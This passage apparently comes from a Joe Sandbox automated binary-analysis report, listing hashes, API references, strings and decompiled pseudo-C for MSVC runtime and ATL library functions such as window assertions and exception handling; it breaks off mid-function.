                      • Opcode Fuzzy Hash: 18bf8a575aa0ddfaadf8269d89de96ed85fd1c33dafbdc47a72b96d2149b226b
                      • Instruction Fuzzy Hash: DD217BB694011CBADB10DF94DC42FEA736C9B54304F404296FA15E6181FA719B548791
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00942900: ___InlineInterlockedCompareExchangePointer.VCCORLIBD ref: 00942927
                        • Part of subcall function 00942900: GetLastError.KERNEL32 ref: 00942935
                        • Part of subcall function 00942900: _HRESULT_FROM_WIN32.LIBCMTD ref: 00942943
                      • _Smanip.LIBCPMTD ref: 0094372B
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      Strings
                      • %ls, xrefs: 00943742
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00943723
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094374E
                      • ERROR : Unable to initialize critical section in CAtlComModule, xrefs: 0094370C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckCompareErrorExchangeInlineInterlockedLastPointerSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlComModule
                      • API String ID: 1685745658-3641726158
                      • Opcode ID: edcae89b5b5ba489cf13329afa8d759cc66863137590c4d38f23e4968af11cce
                      • Instruction ID: af1314612ab2fc65d1072a6af7e51c5764ac89eca8d96a1c1648cb96e7732fa9
                      • Opcode Fuzzy Hash: edcae89b5b5ba489cf13329afa8d759cc66863137590c4d38f23e4968af11cce
                      • Instruction Fuzzy Hash: FF1160B4E44208FBDB00EF9CD956F6DB7B4AB81708F608498F6016B392DBB15F008B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • _Smanip.LIBCPMTD ref: 00956025
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      Strings
                      • %ls, xrefs: 0095603C
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 0095601D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00956048
                      • ERROR - Object deleted before window was destroyed, xrefs: 00956006
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$ERROR - Object deleted before window was destroyed
                      • API String ID: 1089072215-1108591109
                      • Opcode ID: 16c538578a9726e024eecf80f43474b9d66c946300b46236ca6c6f6ab01271fb
                      • Instruction ID: dd1b9ffd0a8cf2a30b2415cf4dc63b887b62e8c1518b3b8287b6872237858a03
                      • Opcode Fuzzy Hash: 16c538578a9726e024eecf80f43474b9d66c946300b46236ca6c6f6ab01271fb
                      • Instruction Fuzzy Hash: 3D11A071E84209ABDB14EF99DC03F6AB768FB80B04F404A2AF605A76C2DAB555048795
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 26%
                      			E0094C110(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				intOrPtr _t15;
                      				void* _t20;
                      				void* _t30;
                      				void* _t31;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				if(_a4 != 0) {
                      					__eflags =  *_a4 - 0x2c;
                      					if(__eflags == 0) {
                      						 *((intOrPtr*)(_a4 + 0x1c)) = 0;
                      						_v8 = E00942900(_a4 + 4, __esi, __eflags);
                      						__eflags = _v8;
                      						if(__eflags < 0) {
                      							_push("ERROR : Unable to initialize critical section in AtlWinModuleInit\n");
                      							_push(0);
                      							_push(E0094F1E0(0xb33748));
                      							_push(E009423B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20d9));
                      							E009423E0(__ebx, __edi, __esi, __eflags);
                      							_t31 = _t31 + 0x10;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								_t20 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20da, 0, "%ls", 0x9f40dc);
                      								_t31 = _t31 + 0x18;
                      								__eflags = _t20 - 1;
                      								if(__eflags == 0) {
                      									asm("int3");
                      								}
                      							}
                      						}
                      						_t15 = _v8;
                      					} else {
                      						_t15 = 0x80070057;
                      					}
                      				} else {
                      					_t15 = 0x80070057;
                      				}
                      				return E009D1520(_t15, _t30 - _t31 + 0xc);
                      			}











                      Strings
                      • %ls, xrefs: 0094C19E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C17F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C1AA
                      • ERROR : Unable to initialize critical section in AtlWinModuleInit, xrefs: 0094C168
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in AtlWinModuleInit
                      • API String ID: 0-4079014719
                      • Opcode ID: 39df43957becd038e591508a3fbac43cb9abf813d76b477f92f85e0106a8f24c
                      • Instruction ID: 2c897fdd0e411f0794bfaaf329a6544efc416f530ad0dd1508e149060ee2825a
                      • Opcode Fuzzy Hash: 39df43957becd038e591508a3fbac43cb9abf813d76b477f92f85e0106a8f24c
                      • Instruction Fuzzy Hash: 5711C2B1E4520CFFDB10EF58DC57F2D3664AB90708F208455FA052B283E6B59A508B85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0095DBA2(void* __ebx, void* __edi, void* __esi) {
                      				intOrPtr* _t31;
                      				void* _t48;
                      
                      				 *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + 0xfffffffffffffffc)) =  *((intOrPtr*)(_t48 - 0x34));
                      				E00959A50(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi,  *((intOrPtr*)(_t48 - 0x38)));
                      				 *((intOrPtr*)(E0095C670(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi) + 0x10)) =  *((intOrPtr*)(_t48 - 0x3c));
                      				 *((intOrPtr*)(E0095C670(__ebx,  *((intOrPtr*)(_t48 - 0x3c)), __edi, __esi) + 0x14)) =  *((intOrPtr*)(_t48 - 0x40));
                      				_t31 =  *((intOrPtr*)(_t48 + 8));
                      				if( *_t31 == 0xe06d7363) {
                      					_t38 =  *((intOrPtr*)(_t48 + 8));
                      					if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x10)) == 3) {
                      						if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930520) {
                      							L5:
                      							if( *((intOrPtr*)(_t48 - 0x44)) == 0 &&  *((intOrPtr*)(_t48 - 0x28)) != 0) {
                      								_t31 = E0095B2C0(_t38,  *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x18)));
                      								if(_t31 != 0) {
                      									if( *((intOrPtr*)(_t48 - 0x48)) == 0) {
                      										 *(_t48 - 0x19) = 0;
                      									} else {
                      										 *(_t48 - 0x19) = 1;
                      									}
                      									_push( *(_t48 - 0x19) & 0x000000ff);
                      									return E0095B0E0( *((intOrPtr*)(_t48 + 8)));
                      								}
                      							}
                      						} else {
                      							_t31 =  *((intOrPtr*)(_t48 + 8));
                      							if( *((intOrPtr*)(_t31 + 0x14)) == 0x19930521) {
                      								goto L5;
                      							} else {
                      								_t38 =  *((intOrPtr*)(_t48 + 8));
                      								if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930522) {
                      									goto L5;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _t31;
                      			}






                      APIs
                        • Part of subcall function 00959A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00959A56
                        • Part of subcall function 00959A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00959A6C
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095DBBF
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095DBCA
                      • __IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 0095DC20
                      • ___DestructExceptionObject.LIBCMTD ref: 0095DC45
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
                      • String ID: csm
                      • API String ID: 485384042-1018135373
                      • Opcode ID: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction ID: 866c5b4a6243dc95cc6d1eac233a52ad9212feea754ad4c59bd559040e9782cc
                      • Opcode Fuzzy Hash: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction Fuzzy Hash: 8C212974902208DFCB28DF66D044AAE7B7AAFA4306F548058EC550F752C774DE89CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E009A8780(intOrPtr _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				signed char _t13;
                      				void* _t18;
                      				void* _t24;
                      
                      				E00976E20( &_v16, _a4);
                      				_t13 = E0098EE40( &_v16);
                      				_t21 = _t13 & 0x000000ff;
                      				if((_t13 & 0x000000ff) == 0) {
                      					_v8 = 0;
                      				} else {
                      					_v8 = 1;
                      				}
                      				_v12 = _v8;
                      				_t27 = _v12;
                      				if(_v12 == 0) {
                      					_t18 = L00994930(_t27, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0, L"%ls", L"stream.valid()");
                      					_t24 = _t24 + 0x18;
                      					if(_t18 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v12 != 0) {
                      					return E009A8760( &_v16);
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t21))) = 0x16;
                      					return E00992900(L"stream.valid()", L"_fileno", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0) | 0xffffffff;
                      				}
                      			}










                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009A878F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                      • API String ID: 4219598475-3741990651
                      • Opcode ID: c8c90eaad939ebefab32ae81ba90f851743838759da985090b34db5c1a0f8a2b
                      • Instruction ID: b01eff24c3af4b591222f96f8c75434f2349033944d1acbe4e0df156a0f4eca9
                      • Opcode Fuzzy Hash: c8c90eaad939ebefab32ae81ba90f851743838759da985090b34db5c1a0f8a2b
                      • Instruction Fuzzy Hash: 2701B1B0E40208BADF24FB94CD42BAEB7A89BC5708F308154F1192A1C2CEB45E44C6D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E009546E0(struct HWND__** __ecx, void* __esi, intOrPtr _a4, int _a8) {
                      				struct HWND__** _v8;
                      				void* _t10;
                      				void* _t17;
                      				void* _t27;
                      				void* _t28;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t10 = E009D1520(IsWindow( *_v8), _t28 - _t28);
                      				_t31 = _t10;
                      				if(_t10 == 0) {
                      					_t17 = L00994930(_t31, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x6d4, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t28 = _t28 + 0x18;
                      					if(_t17 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				E00954630(_a4, E009D1520(GetDlgItem( *_v8, _a8), _t28 - _t28));
                      				return E009D1520(_a4, _t27 - _t28 + 4);
                      			}









                      APIs
                      Strings
                      • %ls, xrefs: 0095470D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00954719
                      • ::IsWindow(m_hWnd), xrefs: 00954708
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ItemWindow
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 1669990519-3692021841
                      • Opcode ID: 4a6eb8dccfb49377e1d4e9d507de30c2683c6dfbca1df7eb8c57cf7d916b49d7
                      • Instruction ID: 43ce43b04f980f45f8ef5e328488adb4fad72e7cb6c44afcc5540876ba4be5b9
                      • Opcode Fuzzy Hash: 4a6eb8dccfb49377e1d4e9d507de30c2683c6dfbca1df7eb8c57cf7d916b49d7
                      • Instruction Fuzzy Hash: BA01F276E81218BBCB10EB58EC43F9E73689F89745F004156F909A7341E671AD4087D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0095B360(intOrPtr* _a4) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				intOrPtr* _v16;
                      				intOrPtr _v20;
                      				void* _t29;
                      				void* _t32;
                      				void* _t39;
                      				void* _t40;
                      
                      				_t33 =  *_a4;
                      				_v12 =  *_a4;
                      				_v8 =  *_v12;
                      				if(_v8 == 0xe0434352 || _v8 == 0xe0434f4d) {
                      					L5:
                      					if( *((intOrPtr*)(E0095C670(_t32, _t33, _t39, _t40) + 0x18)) > 0) {
                      						_v16 = E0095C670(_t32, _t33, _t39, _t40) + 0x18;
                      						 *_v16 =  *_v16 - 1;
                      					}
                      					return 0;
                      				} else {
                      					if(_v8 == 0xe06d7363) {
                      						 *((intOrPtr*)(E0095C670(_t32, _t33, _t39, _t40) + 0x10)) = _v12;
                      						_v20 =  *((intOrPtr*)(_a4 + 4));
                      						_t29 = E0095C670(_t32, _v12, _t39, _t40);
                      						_t33 = _v20;
                      						 *((intOrPtr*)(_t29 + 0x14)) = _v20;
                      						E00999BF0(_v20);
                      						goto L5;
                      					}
                      					return 0;
                      				}
                      			}












                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B393
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B3A7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B3B7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B3C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      • Opcode ID: 6c6199df7b7983c945f9fd93a61295846627afb9c89947af622b240221aa0eaa
                      • Instruction ID: e1e1f56c2082a5cc2eaa99571cb5f2d288dd7726da95b1e65b68a3be9cc34a28
                      • Opcode Fuzzy Hash: 6c6199df7b7983c945f9fd93a61295846627afb9c89947af622b240221aa0eaa
                      • Instruction Fuzzy Hash: 54111B78D02209DFCB14EFA9C14555DBBB0FF49301F1085A9DC05A7311D778DA44DB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E0094C410(struct HWND__** __ecx, void* __esi, int _a4) {
                      				struct HWND__** _v8;
                      				void* _t8;
                      				void* _t13;
                      				void* _t22;
                      				void* _t23;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t8 = E009D1520(IsWindow( *_v8), _t23 - _t23);
                      				_t26 = _t8;
                      				if(_t8 == 0) {
                      					_t13 = L00994930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x508, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t23 = _t23 + 0x18;
                      					if(_t13 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				return E009D1520(E009D1520(ShowWindow( *_v8, _a4), _t23 - _t23), _t22 - _t23 + 4);
                      			}









                      APIs
                      Strings
                      • %ls, xrefs: 0094C43D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 0094C449
                      • ::IsWindow(m_hWnd), xrefs: 0094C438
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Show
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 990937876-3692021841
                      • Opcode ID: 5e7d01a44d1072706e94137cd43692dfa4f71e3adc29b382da244b7a57b4077b
                      • Instruction ID: 6ceea2bc79fd7af420e05405faa854868ed493af4f12cee5efd1fc13e280e689
                      • Opcode Fuzzy Hash: 5e7d01a44d1072706e94137cd43692dfa4f71e3adc29b382da244b7a57b4077b
                      • Instruction Fuzzy Hash: ACF0F472E812087BC710E798AC43F6E73689B88700F104255FA05A3341E575AE0056D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00954DE0(struct HWND__** __ecx, void* __esi) {
                      				struct HWND__** _v8;
                      				void* _t7;
                      				void* _t12;
                      				void* _t20;
                      				void* _t21;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t7 = E009D1520(IsWindow( *_v8), _t21 - _t21);
                      				_t24 = _t7;
                      				if(_t7 == 0) {
                      					_t12 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x35f, 0, "%ls", L"::IsWindow(m_hWnd)");
                      					_t21 = _t21 + 0x18;
                      					if(_t12 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				return E009D1520(E009D1520(GetWindowLongA( *_v8, 0xfffffff0), _t21 - _t21), _t20 - _t21 + 4);
                      			}









                      APIs
                      Strings
                      • %ls, xrefs: 00954E0D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00954E19
                      • ::IsWindow(m_hWnd), xrefs: 00954E08
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 847901565-3692021841
                      • Opcode ID: f2ee7fa46c23a8114639c2c3d048f3ecbe1e41f2cd707f7a688ba91bb89c2e86
                      • Instruction ID: aeab49ad66918572267c9b2db63df3e7f312b55dadbf0a9554d218445090a281
                      • Opcode Fuzzy Hash: f2ee7fa46c23a8114639c2c3d048f3ecbe1e41f2cd707f7a688ba91bb89c2e86
                      • Instruction Fuzzy Hash: 20F0F632E852287BC720E79CAC43F5E73689F85715F100395FE09A7391E5659D4047C6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00954660(struct HWND__** __ecx, void* __esi) {
                      				struct HWND__** _v8;
                      				void* _t7;
                      				void* _t12;
                      				void* _t20;
                      				void* _t21;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t7 = E009D1520(IsWindow( *_v8), _t21 - _t21);
                      				_t24 = _t7;
                      				if(_t7 == 0) {
                      					_t12 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x50e, 0, "%ls", L"::IsWindow(m_hWnd)");
